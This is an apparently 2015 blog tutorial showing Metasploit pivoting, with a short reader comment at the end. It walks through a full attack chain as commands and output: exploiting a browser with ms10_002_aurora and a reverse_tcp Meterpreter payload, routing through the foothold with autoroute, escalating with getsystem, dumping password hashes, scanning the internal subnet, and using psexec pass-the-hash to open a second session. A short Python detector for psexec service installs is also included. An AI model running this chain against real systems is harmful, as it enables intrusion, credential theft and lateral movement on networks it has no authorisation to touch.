Metasploit: Routing Traffic from a Non-Routable Network

July 14, 2015 | Views: 8158


According to Offensive-Security:

Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.

In this scenario, we’ll be using it for routing traffic from a normally non-routable network.

For this, we'll use the exploit "exploit/windows/browser/ms10_002_aurora". We need to set URIPATH, along with the payload and LHOST:

msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx

Listing the sessions shows the one the exploit gave us:

msf exploit(ms10_002_aurora) > sessions -l

Now we need the subnet mask and route discovery for the network behind that host; the autoroute script handles this:

meterpreter > run autoroute -h
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s xx.x.x.x -n 255.255.255.0  # Add a route to x.x.x.x/255.255.255.0
[*]   run autoroute -s x.x.x.x                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s x.x.x.x/24              # CIDR notation is also okay
[*]   run autoroute -p                         # Print active routing table
[*]   run autoroute -d -s x.x.x.x              # Deletes the x.x.x.x/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
meterpreter > run autoroute -s x.x.x.x/24
[*] Adding a route to x.x.x.x/255.255.255.0...
[+] Added route to x.x.x.x/255.255.255.0 via 192.168.1.0
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   x.x.x.x          255.255.255.0      Session 1

Why do this? Traffic for the second network must be routed through, and appear to come from, the compromised host in session 1. Type ifconfig in the Meterpreter session and you'll see the victim's interface on that subnet; that is the address we need to use, so that subnet and its mask are now routed through the session.

Now we need access to that system, too. First escalate with getsystem and dump the local hashes, then use the pass-the-hash method explained previously.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c2ec80f879c1123b5dc8d24f1xxe2c37a45...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:81cbcea8a9af9as3bbaad3b435b51404ee:561cbdae13dded5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3sd435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::
SUPPORT_s388945a0:1002:aad3b435b51404eeaad3b435b51das404ee:ebf9fa44b3204029db5a8a77f5350160:::
Thinker:1004:81casbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5aasbd30aa94ddeb3cf52d:::

Next we need a host on the routed subnet that we can reach with a bind_tcp payload. For that, we can use the TCP port scanner module, which now goes through the pivot:

msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options

Module options:

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output

msf auxiliary(tcp) > set RHOSTS x.x.x.x/24
RHOSTS => x.x.x.x/24
msf auxiliary(tcp) > set PORTS 179,445
PORTS => 179,445
msf auxiliary(tcp) > set THREADS 20
THREADS => 20
msf auxiliary(tcp) > run
[*] x.x.x.x:445 - TCP OPEN

Now pass the hash with psexec, using a bind_tcp payload so the new session is reached through the pivot:

msf auxiliary(tcp) > use exploit/windows/smb/psexec 
msf exploit(psexec) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created qANuICKyR.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (UOtrbJMd - "AuiSy")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting ssWSdV.exe...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (192.168.1.0-192.168.1.255:0 -> x.x.x.x:4444) at Mon Jul 11 12:56:42 -0700 2015
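As an added defender's example (not from the original post), here is a small Python check over constructed Windows Event ID 7045 records that flags service installs matching the pattern the psexec output above shows: a randomly named service, a randomly named executable, and a binary dropped into the Windows root through ADMIN$. The records, field names and scoring thresholds are assumptions made for this illustration; since an operator can choose a plain service name, treat this as one signal to correlate, not a rule.

```python
import re

# Constructed sample records modelled on Windows System log Event ID 7045
# ("A service was installed in the system"). Field names follow the event
# XML, the values are invented, and the first record mirrors the service and
# binary names shown in the psexec output above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "UOtrbJMd",
     "ImagePath": "%SYSTEMROOT%\\qANuICKyR.exe", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "gupdate",
     "ImagePath": '"C:\\Program Files\\Google\\Update\\GoogleUpdate.exe" /svc',
     "StartType": "auto start"},
    {"EventID": 7036, "ServiceName": "UOtrbJMd", "ImagePath": ""},  # state change, not an install
]

LETTERS_ONLY = re.compile(r"^[A-Za-z]{6,12}$")

def looks_random(name):
    """Heuristic for random-letter names such as UOtrbJMd or qANuICKyR:
    short, letters only, and upper/lower case flipping between neighbours far
    more often than in real names (Spooler, GoogleUpdate)."""
    if not LETTERS_ONLY.match(name):
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return flips / (len(name) - 1) >= 0.4

def executable_path(image_path):
    """Strip quoting and arguments from an ImagePath, leaving the binary's path."""
    p = image_path.strip()
    p = p[1:].split('"', 1)[0] if p.startswith('"') else p.split(" ", 1)[0]
    return p.replace("/", "\\")

def score_event(ev):
    """One point per psexec-like trait; 0 for anything that is not an install."""
    if ev.get("EventID") != 7045:
        return 0
    directory, _, exe = executable_path(ev["ImagePath"]).rpartition("\\")
    score = int(looks_random(ev["ServiceName"]))
    score += int(exe.lower().endswith(".exe") and looks_random(exe[:-4]))
    # psexec writes the binary to ADMIN$, i.e. the Windows root, not System32
    score += int(directory.upper() in ("%SYSTEMROOT%", "C:\\WINDOWS")
                 or directory.upper().endswith("ADMIN$"))
    return score

def flag_psexec_like(events, threshold=2):
    """Return names of installed services showing at least `threshold` traits."""
    return [ev["ServiceName"] for ev in events if score_event(ev) >= threshold]
```

Correlate a hit with the 4624 logon (type 3, NTLM) that preceded it and with the binary's quick deletion, which the psexec output above also shows.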

Voilà! Type ipconfig in the new session to confirm that we reached the second system through the first victim's connection, even though it was not directly reachable from our machine (it sits on a network we had no route to).


— Multi Thinker

6 Comments
  1. Can you please share pivoting techniques with lab scenario without using metasploit. How to do manual pivoting?